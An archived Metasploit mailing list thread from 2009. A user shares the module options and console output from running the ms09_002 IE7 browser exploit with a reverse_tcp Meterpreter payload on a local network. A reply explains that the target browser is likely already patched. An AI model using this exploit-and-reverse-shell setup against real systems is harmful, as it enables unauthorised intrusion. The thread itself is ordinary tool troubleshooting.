Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

use of ms09_002 and xml_corruption modules

From: natron at invisibledenizen.org (natron)
Date: Wed, 1 Apr 2009 13:09:43 -0500
It's not hanging.  The module's letting you know a request came in and
it responded with the html code.  Depending on your payload, if the
exploit was successful, you would see further messages about the
additional stages being downloaded and then dumped at the payload
prompt.

What you're seeing is what you would see if the browser was not
vulnerable to either of those exploits.  You have most likely already
patched.

On Wed, Apr 1, 2009 at 1:07 PM, jeffs <jeffs at speakeasy.net> wrote:

When I use either of these modules 'sploit just hangs on the last line -- am
I to presume that means my version of IE7 is not vulnerable or do I
perchance have a wrong setting below?

thanks.

Same result with xml_corruption..


Module options:

?Name ? ? Current Setting ?Required ?Description
? ? ? ? ? ? ?---- ? ? --------------- ?-------- ?-----------
? ? ? ? ? ? ? ? ? ? ? ? ?SRVHOST ?0.0.0.0 ? ? ? ? ?yes ? ? ? The local host
to listen on. ? ? ? ? ? ? ? ? ? ? ? ? ?SRVPORT ?8080 ? ? ? ? ? ? yes
The local port to listen on. ? ? ? ? ? ? ? ? ? ? ? ? ?SSL ? ? ?false
? ?no ? ? ? ?Use SSL ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?URIPATH
?test ? ? ? ? ? ? no ? ? ? ?The URI to use for this exploit (default is
random)

Payload options (windows/reflectivemeterpreter/reverse_tcp):

?Name ? ? ?Current Setting ?Required ?Description
?---- ? ? ?--------------- ?-------- ?-----------
?EXITFUNC ?process ? ? ? ? ?yes ? ? ? Exit technique: seh, thread, process
?LHOST ? ? 192.168.1.101 ? ?yes ? ? ? The local address
?LPORT ? ? 4444 ? ? ? ? ? ? yes ? ? ? The local port

Exploit target:

?Id ?Name ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?-- ?----
? ? ? ? ? ? ? ? ? ? ? ? ? ? ?0 ? Windows XP SP2-SP3 / Windows Vista SP0 / IE
7

msf exploit(ms09_002_memory_corruption) > exploit
[*] Exploit running as background job.
msf exploit(ms09_002_memory_corruption) >
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/test
[*] ?Local IP: http://192.168.1.101:8080/test
[*] Server started.
[*] Sending Internet Explorer 7 Uninitialized Memory Corruption
Vulnerability to 192.168.1.100:1704... ?<----- just hangs here
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
Previous By Date Next
Previous By Thread Next

Current thread: